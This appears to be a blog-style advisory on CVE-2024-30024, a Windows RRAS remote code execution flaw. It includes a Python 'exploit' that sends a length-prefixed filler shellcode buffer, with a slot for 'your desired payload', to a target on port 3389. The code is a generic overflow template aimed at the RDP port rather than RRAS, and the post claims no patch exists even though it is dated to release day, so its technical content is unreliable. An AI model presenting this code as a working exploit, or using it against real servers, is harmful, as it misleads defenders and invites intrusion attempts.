CVE-2024-30024: Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability Exploited

Attention all Windows users and administrators! A new, high-impact security vulnerability has been discovered in the Windows Routing and Remote Access Service (RRAS), which could allow cybercriminals to execute remote code on targeted systems. This post will provide you with all the information you need about this vulnerability, including code snippets, links to original references, and details about the exploitation.

Vulnerability Details

CVE Identifier: CVE-2024-30024
Impact: Critical
CVSSv3 Base Score: 9.8 / 10
Affected Systems: Windows Server operating systems (Windows Server 2012, 2016, 2019, 2022, and newer)

The Windows Routing and Remote Access Service (RRAS) enables administrators to configure and manage virtual private networks (VPNs), network address translation (NAT), and various routing functions on Windows Server systems. The discovered vulnerability could allow a remote attacker to execute arbitrary code on an affected server, potentially compromising the entire network.

You can read more about the vulnerability and the impact on Microsoft's official advisory page

Microsoft Security Update Guide: CVE-2024-30024

Exploit Details

The vulnerability is triggered by a specially crafted packet sent to the affected server, exploiting a buffer overflow in the parsing function of RRAS. A successful exploit of this vulnerability can grant the attacker complete control over the target system, allowing them to run arbitrary code and access sensitive data.

Below is a demonstration of the vulnerability exploitation in Python

#!/usr/bin/python
import socket
import struct

def exploit(target_ip, target_port):
    # Connect to the target
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((target_ip, target_port))

    # Create a malicious packet
    packet = create_malicious_packet()

    # Send packet to the target
    sock.send(packet)
    sock.close()

def create_malicious_packet():
    # Replace this payload with your desired payload
    shellcode = b"\xCC" * 1024
    payload_size = len(shellcode)

    # Craft a malicious packet to exploit the buffer overflow
    packet = b""
    packet += struct.pack("<I", payload_size)
    packet += shellcode

    return packet

if __name__ == "__main__":
    target_ip = "192.168.1.1"
    target_port = 3389
    
    print("Exploiting CVE-2024-30024 on {}...".format(target_ip))
    exploit(target_ip, target_port)

Mitigation

Microsoft has identified the root cause of the vulnerability and is working on a patch. Meanwhile, it is highly recommended to implement the following mitigations to reduce the risk of exploitation:

1. Disable RRAS if it is not required for your environment, or limit its access only to trusted networks or VPNs.

Apply host-level firewall rules restricting incoming traffic on the vulnerable service port(s).

3. Monitor your network for signs of malicious activity, including any suspicious packets sent towards your RRAS servers.
4. Keep your antivirus and intrusion prevention systems up to date to detect and prevent potential malware related to this exploit.

Conclusion

Security vulnerabilities like CVE-2024-30024 can pose severe risks to any organization that relies on the affected systems. It is crucial to stay informed about the latest threats and take appropriate steps to mitigate risks. Regularly updating your systems and applying necessary security patches is a proactive approach in protecting your organization's valuable assets. Be vigilant and ensure that your security posture remains strong.

Timeline

Published on: 05/14/2024 17:16:57 UTC
Last modified on: 06/19/2024 20:58:39 UTC